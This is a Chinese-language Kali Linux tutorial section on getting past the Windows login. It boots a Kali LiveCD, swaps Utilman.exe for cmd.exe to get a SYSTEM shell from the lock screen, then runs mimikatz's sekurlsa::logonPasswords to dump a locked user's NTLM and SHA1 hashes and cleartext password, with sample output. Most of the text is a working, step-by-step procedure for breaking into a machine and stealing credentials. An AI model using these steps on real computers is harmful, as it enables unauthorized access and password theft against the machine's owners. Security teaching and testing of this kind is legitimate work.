• 8.4 绕过Utilman登录

    8.4 绕过Utilman登录

    Utilman是Windows辅助工具管理器。该程序是存放在Windows系统文件中最重要的文件,通常情况下是在安装系统过程中自动创建的,对于系统正常运行来说至关重要。在Windows下,使用Windows+U组合键可以调用Utilman进程。本节将介绍绕过Utilman程序登录系统,就可以运行其他操作。

    (1)在Windows界面,启动Kali Linux LiveCD,如图8.7所示。

    261-01

    图8.7 Kali Linux引导界面

    (2)在该界面选择Live (686-pae),按下回车键即可启动Kali Linux,如图8.8所示。

    261-02

    图8.8 Kali Linux操作系统

    (3)在该界面打开Windows文件系统。在Kali Linux桌面依次选择Places|43GB Filesystem选项,将打开如图8.9所示的界面。这里的43G表示当前Windows系统的磁盘大小。

    262-01

    图8.9 Windows磁盘中的文件和文件夹

    (4)该界面显示了Windows操作系统中的文件和文件夹。这里依次打开Windows|System32文件夹,将显示如图8.10所示的内容。

    262-02

    图8.10 System32目录中的内容

    (5)在该文件夹中找到Utilman.exe文件,将该文件重命名为Utilman.old。然后复制cmd.exe文件,并将其文件名修改为Utilman.exe。

    (6)现在关闭Kali Linux,并启动Windows系统。在登录界面按下Windows+u组合键,将显示如图8.11所示的界面。

    263-01

    图8.11 Windows登录界面

    (7)从该界面可以看到打开一个命令提示符窗口。在该窗口中,可以执行一些DOS命令。例如,使用whoami命令查看用户信息,将显示如图8.12所示的界面。

    263-02

    图8.12 用户权限信息

    (8)从输出的界面可以看到,当前用户拥有最高的权限。此时,就可以进行任何的 操作。

    学习了绕过Utilman登录后,可以使用mimikatz工具恢复目标系统锁定状态时用户的密码。下面将介绍使用mimikatz工具,从锁定状态恢复密码。

    在操作之前需要做一些准备工作。首先从http://blog.gentilkiwi.com/mimikatz网站下载mimikatz工具,其软件包名为mimikatz_trunk.zip。然后将该软件包解压,并保存到一个USB磁盘中。本例中,将解压的文件保存到优盘的mimikatz目录中。

    (1)在系统中安装Utilman Bypass,以便能执行一些命令。

    (2)在锁定桌面的Windows桌面按下Windows+u组合键,如图8.13所示。

    264-01

    图8.13 启动命令行

    默认情况下使用Windows+u组合键启动DOS窗口后,该窗口缓冲区的高度是30。当输出的数据较多时,将看不到所有的内容。所以需要到DOS窗口的属性菜单中,增加窗口的高度,如图8.14所示。

    264-02

    图8.14 属性菜单

    在该界面选择“布局”标签,修改屏幕缓冲区大小下面的高度值。然后单击“确定”按钮,即可滚动鼠标查看所有内容。

    (3)从图8.13中可以看到,Windows7系统处于锁定状态。此时通过在命令行执行一些命令恢复Windows用户密码。首先确认当前用户的权限,执行命令如下所示:

    1. C:\Windows\system32> whoami
    2. nt authority\system

    (4)进入到USB磁盘中,并查看磁盘中的内容。本例中的USB磁盘号F:,执行命令如下所示:

    1. C:\Windows\system32> F:
    2. F:\>dir mimikatz
    3. 2014/05/26 03:45 4,311 README.md
    4. 2014/06/15 04:54 Win32
    5. 2014/06/15 04:54 x64

    从输出的信息中,可以看到mimikatz目录中有三个文件。其中Win32和x64表示mimikatz的两个版本。根据自己的系统架构选择相应的版本,本例中的操作系统是32位,所以选择使用Win32。

    (5)查看Win32目录中的内容:

    1. F:\>cd mimikatz
    2. F:\Mimikatz>cd win32
    3. F:\Mimikatz\Win32>dir
    4. 2014/06/15 04:54 29,056 mimidrv.sys
    5. 2014/06/15 04:54 189,936 mimikatz.exe
    6. 2014/06/15 04:54 27,632 mimilib.dll

    从输出的信息中,可以看到Win32目录中有三个文件。其中,mimikatz是一个可执行文件。

    (6)运行mimikatz程序。执行命令如下所示:

    265-01

    输出信息显示了mimikatz的一些相关信息,其中mimikatz #提示符表示成功登录到了mimikatz程序。

    (7)恢复密码。执行命令如下所示:

    1. mimikatz # sekurlsa::logonPasswords

    或:

    1. mimikatz # sekurlsa::logonPasswords full

    将输出如下所示的信息:

    1. Authentication Id : 0; 10201252 (00000000:009ba8a4)
    2. Session : Interactive from 1
    3. User Name : lyw
    4. Domain : Windows7Test
    5. SID : S-1-5-21-2306344666-604645106-2825843324-1001
    6. msv :
    7. [00010000] CredentialKeys
    8. * NTLM : 32ed87bdb5fdc5e9cba88547376818d4
    9. * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
    10. [00000003] Primary
    11. * Username : lyw
    12. * Domain : Windows7Test
    13. * NTLM : 32ed87bdb5fdc5e9cba88547376818d4
    14. * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
    15. tspkg :
    16. wdigest :
    17. * Username : lyw
    18. * Domain : Windows7Test
    19. * Password : 123456
    20. kerberos :
    21. * Username : lyw
    22. * Domain : Windows7Test
    23. * Password : (null)
    24. ssp :
    25. credman :

    从以上输出信息中,可以看到锁定用户的所有信息。如用户名、各种加密的HASH值、域名和密码等。

    原文: https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/44.html